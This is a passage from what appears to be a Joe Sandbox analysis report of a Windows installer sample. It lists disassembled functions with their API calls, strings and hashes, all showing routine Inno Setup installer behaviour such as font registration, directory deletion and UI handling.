                                                                  • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                                  • Failed to open Fonts registry key., xrefs: 004700A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                  • API String ID: 955540645-649663873
                                                                  • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                  • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                                  • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                  • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                                  Function 00462C58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                    • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                    • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                                  • GetVersion.KERNEL32 ref: 00462C88
                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                                  • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                                  • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                  • String ID: Explorer
                                                                  • API String ID: 2594429197-512347832
                                                                  • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                  • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                                  • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                  • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                                  Function 00477E04 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC), ref: 00477E60
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                  • API String ID: 2704155762-2318956294
                                                                  • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                  • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                                  • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                  • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                                  Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                  • LocalFree.KERNEL32(00592898,00000000,00401B68), ref: 00401ACF
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00592898,00000000,00401B68), ref: 00401AEE
                                                                  • LocalFree.KERNEL32(00593898,?,00000000,00008000,00592898,00000000,00401B68), ref: 00401B2D
                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                  • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID: l>Y
                                                                  • API String ID: 3782394904-3992852859
                                                                  • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                  • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                  • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                  • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                  Function 00459C2C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                                    • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                                  Strings
                                                                  • Failed to strip read-only attribute., xrefs: 00459CC0
                                                                  • Deleting directory: %s, xrefs: 00459C7B
                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                                  • Failed to delete directory (%d)., xrefs: 00459D88
                                                                  • Stripped read-only attribute., xrefs: 00459CB4
                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseErrorFindLast
                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                  • API String ID: 754982922-1448842058
                                                                  • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                  • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                                  • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                  • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                                  Function 00422E48 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCapture.USER32 ref: 00422E9C
                                                                  • GetCapture.USER32 ref: 00422EAB
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                                  • ReleaseCapture.USER32 ref: 00422EB6
                                                                  • GetActiveWindow.USER32 ref: 00422EC5
                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                                  • GetActiveWindow.USER32 ref: 00422FB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                  • String ID:
                                                                  • API String ID: 862346643-0
                                                                  • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                  • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                                  • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                  • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                                  Function 0042F288 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                                  • GetActiveWindow.USER32 ref: 0042F2D2
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                                  • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveLong$Message
                                                                  • String ID:
                                                                  • API String ID: 2785966331-0
                                                                  • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                  • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                                  • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                  • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                                  Function 00429478 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000), ref: 00429482
                                                                  • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                  • String ID:
                                                                  • API String ID: 361401722-0
                                                                  • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                  • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                                  • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                  • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                                  Function 0041DE1C Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectStock$A24620A480A570IconLoad
                                                                  • String ID:
                                                                  • API String ID: 3573811560-0
                                                                  • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                  • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                                  • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                  • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                                  Function 00463068 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                                  • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load
                                                                  • String ID: $ $Internal error: Item already expanding
                                                                  • API String ID: 1675784387-1948079669
                                                                  • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                  • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                                  • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                  • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                                  Function 00453D04 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                  • API String ID: 390214022-3304407042
                                                                  • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                  • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                                  • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                  • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                                  Function 004766E4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                                  • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                                  • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A259ClassInfoMessageSend
                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                  • API String ID: 3217714596-4234151509
                                                                  • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                  • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                                  • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                  • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                                  Function 00408710 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                                    • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                    • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$DefaultSystem
                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 1044490935-665933166
                                                                  • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                  • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                                  • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                  • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                                  Function 004116EC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                                    • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                                    • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                  • String ID: ,$?
                                                                  • API String ID: 2359071979-2308483597
                                                                  • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
